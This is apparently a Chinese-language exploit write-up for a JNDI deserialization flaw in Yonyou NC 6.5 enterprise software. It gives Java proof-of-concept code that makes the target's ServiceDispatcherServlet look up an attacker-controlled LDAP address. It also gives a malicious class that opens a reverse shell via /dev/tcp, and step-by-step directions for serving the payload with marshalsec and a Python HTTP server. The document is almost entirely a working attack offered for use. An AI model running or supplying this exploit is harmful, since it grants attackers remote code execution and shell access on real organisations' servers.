零: 用友nc6.5反序列化依赖jar包

0x01:攻击java代码

import nc.bs.framework.common.NCLocator;

import java.util.Properties;


public class poc {

    public static void attack(String url, String jndipath) {
        Properties env = new Properties();
        if (!url.startsWith("http")) {
            url = "http://" + url;
        }
        env.put("SERVICEDISPATCH_URL", url + "/ServiceDispatcherServlet");
        NCLocator locator = NCLocator.getInstance(env);
        locator.lookup(jndipath);
    }

    public static void main(String[] args) {
        attack("http://192.168.1.1:81", "ldap://192.168.1.2:1099/remote");
    }
}

运行起来主要报classNotFound,必需第三方jar包如下:

  • ncdepend.jar
  • log4j-1.2.15.jar
  • log.jar
  • 部分依赖jar包在安装完nc6.5系统后,一般在C://yonyou//home//lib//目录下,前提需要有nc6.5的安装包;或者下载仓库内的依赖包:
    • 点击以了解yonyou-nc6.5-lib
      • 本机运行环境
        java version "1.8.0_181"
        Java(TM) SE Runtime Environment (build 1.8.0_181-b13)
        Java HotSpot(TM) 64-Bit Server VM (build 25.181-b13, mixed mode)
      
        javac 1.8.0_181
      
  • 学习教程README
  • 下载
[anonymous] DEBUG  - Invoke nc.bs.framework.server.RemoteMetaContext.lookup write info to server spend time: 188 
Exception in thread "main" nc.bs.framework.exception.FrameworkIOException: Remote request error

0x02:远程利用java恶意代码

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.Serializable;
import java.util.Hashtable;

public class remote implements ObjectFactory, Serializable {

    public remote() {
        try{
            java.lang.Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","sh -i >& /dev/tcp/ip/port 0>&1"});
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return null;
    }
}

0x03:使用方法

  • Jetbrains IDEA :file -> New -> Project -> Java
  • 恶意LDAP:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.1.2:8000/#remote" 1099
  • HTTP SERVER(remote.class):python3 -m http.server
  • 填入主方法下attck url & jndipath -> run poc.main()即可。
  • enjoy.

0x04:参考链接